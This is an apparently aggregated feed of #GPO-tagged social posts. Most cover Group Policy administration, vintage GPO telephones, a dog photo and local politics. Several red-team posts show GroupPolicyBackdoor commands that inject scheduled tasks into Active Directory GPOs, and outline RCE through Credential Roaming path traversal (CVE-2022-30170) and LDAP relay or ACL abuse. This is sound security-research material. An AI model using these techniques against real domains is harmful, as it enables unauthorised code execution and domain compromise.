共有PCでのアカウントロックをグループポリシーで防止する
https://qiita.com/Shimizu_Kazuya/items/0e536cf193c7981aa4cc?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #Windows #Security #アカウントロック #グループポリシー #GPO

Create GPO to copy a file in a certain location and create a shortcut to that exe on Desktop

Copy a file

📖 Read more: https://sajalchoudhary.net/til/create-gpo-to-copy-a-file-in-a-certain-location-and-create-a-shortcut-to-that-exe-on-desktop/

#windows #gpo #shortcut

Active Directory : le guide complet pour configurer une stratégie d’audit avancée https://www.it-connect.fr/tuto-strategie-audit-active-directory/ #ActiveDirectory #Cybersécurité #GPO

Κυριάκο άρχοντα σκίσε μας
#GPO #StarGr

Pictures from the recent THG Swapmeet at Milton Keynes! For more photos you can always join the official Telecommunications heritage group on Facebook. Swapmeets are available to paid THG members, join here https://membermojo.co.uk/thg

#vintage #telephones #heritage #strowger #THG #swapmeet #telecoms #GPO #PO #Dials

GPO – Word : comment désactiver l’utilisation de OneDrive comme emplacement par défaut ? https://www.it-connect.fr/gpo-word-desactiver-utilisation-de-onedrive-comme-emplacement-par-defaut/ #Stratégiedegroupe #Microsoft365 #OneDrive #Word #GPO

Cleaning up Windows 11 bloat the right way.
I wrote a practical tutorial on removing preinstalled Microsoft Store apps for existing users and new profiles, plus the new policy-based removal for Win11 Enterprise/Edu (Intune/GPO). Includes XML + PowerShell you can ship today.

🔗 https://www.kylereddoch.me/blog/remove-preinstalled-microsoft-store-apps-in-windows-11-24h2-and-25h2/

#Windows11 #Intune #GPO #PowerShell #SysAdmin #Infosec

Windows 11 25H2 : comment supprimer les applications par défaut avec une GPO ou Intune ? https://www.it-connect.fr/windows-11-25h2-comment-supprimer-les-applications-par-defaut-avec-une-gpo-ou-intune/ #Stratégiedegroupe #Windows11 #intune #GPO

GroupPolicyBackdoor

#redteam #python #windows #gpo

Инструмент постэксплуатации для различных манипуляций с GPO. Написан на Python.
Впервые представлен на [DEFCON_33] (https://www.synacktiv.com/sites/default/files/2025-08/roland_becard_turning-your-active-directory-into-the-attackers-c2_slides.pdf)

Примеры:

#backup

```sh
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
```

#inject

```sh
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
```

Пример ini:

```ini
[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
```

Windows 11 25H2 : quels sont les nouveaux paramètres de GPO ? Voici un récapitulatif ! https://www.it-connect.fr/windows-11-25h2-nouveaux-parametres-de-gpo/ #Stratégiedegroupe #Microsoft #Windows11 #GPO

Irish Terrier Practises Street Yoga

Was it yoga, or was there another dog just out of frame and this Irish Terrier wanted to be friends?

Irish Terriers are one of the oldest terrier breeds and are nicknamed “daredevils” because of their famously spirited and fearless temperament. During World War I, Irish Terriers were used as messenger dogs in the trenches, carrying communications between units under incredibly dangerous conditions. They were so effective and brave that they earned widespread admiration. One officer wrote that they were “extraordinarily intelligent, faithful, and honest, and a man who has one of them as a companion will never lack a true friend.” That stretching behaviour you see in the photo? It’s actually a natural “play bow”. Dogs use it not just to stretch their muscles but also as a social signal to other dogs (and sometimes humans) that they’re feeling playful and want to engage. So this little terrier might just be inviting passersby on Oliver Plunkett Street to join in the fun!

#cityPets #Cork #CorkCity #CorkCityCentre #CorkLife #dogPhotography #GPO #GPOCork #Ireland #IrishDogs #IrishPhotos #IrishTerrier #OliverPlunkettStreet #petPhotography #Photo #Photography #shoppingInCork #StreetPhotography #streetScene #terrierStretching #urbanDogs

@mastodonmigration @moira “100% _cannot_ tell that you're watching”

The method used in the #UK by #GPO is as such: “The television receivers are detected by means of the induction magnetic field emanating from the line-scanning coils of the receiver; it is important to note that almost all working television receivers produce this field, that it is independent of whether an outdoor or an indoor aerial is used and that it is not readily possible to screen receivers to reduce the strength of the field to a degree such as to make detection impossible.”

This method is for CRT tvs, so you’ll be safe. 📺☺️

#TV / #TVDetection <https://www.britishtelephones.com/ri/tv.htm>

#telephony #gpo #telephones

I've had a PBX box for a while now, and I've been bugging @lpbkdotnet here on a few tips and tricks.

I have the (I don't know wha the name of it is), "master telephone" responsible for being able to programme the PBX -- this is the only way this can be done -- including working out extensions for telephones.

In the course of my (albeit very naive/young) #telephony interest, I've come to own a few GPO devices which have a no. 7 handset in them:

https://www.britishtelephones.com/hands7.htm

These aren't common at all.

But.

Ideally, I'd love to be in a position where there were a way to mute any GPO phone, but to have a modified external "light" or some indication that if such a phone were on "mute", that it we're obvious.

When I say "mute", GPO telephones have a mechanism to do so in the middle, if such a switch is fitted.

So, @lpbkdotnet -- I guess what I'm asking in your experience is whether:

1. I can get "mute switches" and fit them to any GPO phone?

2. Given the proviso that Handset No. 7 is rare, how might I connect some sort of "external light" indicator to make up for that?

I am aware of the vintage-radio.net forum, but thought I'd find the wisdom the crows here first.

Thanks everyone! :)

If Doug Ford was serious about dangerous driving, his #PCPO gov't would have passed the vulnerable road user law by now! It passed 2nd reading in Fall 2021 but committee meetings didn't get held, while the latest attempt failed in Fall 2023. #shame #BikeTO #WalkTO #ONpoli #ONDP #OLP #GPO #VisionZero

RE: https://bsky.app/profile/did:plc:3a4zpq3a5zj3de5ynvtzb4ny/post/3ly4k3kgtmh2s

GPO : comment couper le Wi-Fi automatiquement quand un câble réseau est branché ? https://www.it-connect.fr/gpo-comment-couper-le-wi-fi-automatiquement-quand-un-cable-reseau-est-branche/ #Stratégiedegroupe #Windows #GPO

#red_team #LDAP #GPO #ACL #RCE

Существует механизм `Credential Roaming`, который используется для уменьшения количества выданных сертификатов в случае `AutoEnrollment`-операций пользователей. Система, на которой логинится пользователь, считывает специальный атрибут пользователя из `LDAP` (`msPKIAccountCredentials`), в котором хранится непосредственно выданный сертификат, после чего сохраняет этот сертификат на локальном устройстве. Однако этот атрибут уязвим к `Path Traversal`-атаке, и мы можем задать ему такое значение, что система автоматически сама себе пропишет, например, .bat-файл в автозагрузку, что и приведет к `RCE`.

Таким образом, если целевая система уязвима, то мы можем попробовать прописать в этот атрибут специальное значение из статьи (https://cloud.google.com/blog/topics/threat-intelligence/apt29-windows-credential-roaming/) и добиться исполнения команд при следующем логине пользователя на компьютер.

#red_team #LDAP #GPO #ACL #RCE

А что, если есть `NTLM Relay` в `LDAP`, но домен старого уровня и никакой `Shadow Credentials` и `RBCD` не работает?

В этом случае можно попробовать следующее:
- Собрать базу `LDAP`, поискать пароль в атрибутах учёток (обязательно вспомнить и про `unixUserPassword`);
- Добавить компьютерную учётку и эксплуатировать с неё, при наличии достаточных прав на другие объекты в домене;
- Вспомнить про возможность поднятия интерактивной сессии с `LDAP` и злоупотребления `ACL`. Например, через командлет `gain_fullcontrol` в случае наличия прав `GenericAll/WriteDACL`. Либо же эксплуатации `GPO`, смотри `GPOddity` (https://github.com/synacktiv/GPOddity).

Однако мы можем получить RCE! И это CVE-2022-30170 (https://cloud.google.com/blog/topics/threat-intelligence/apt29-windows-credential-roaming/), которая была обнаружена специалистами Mandiant.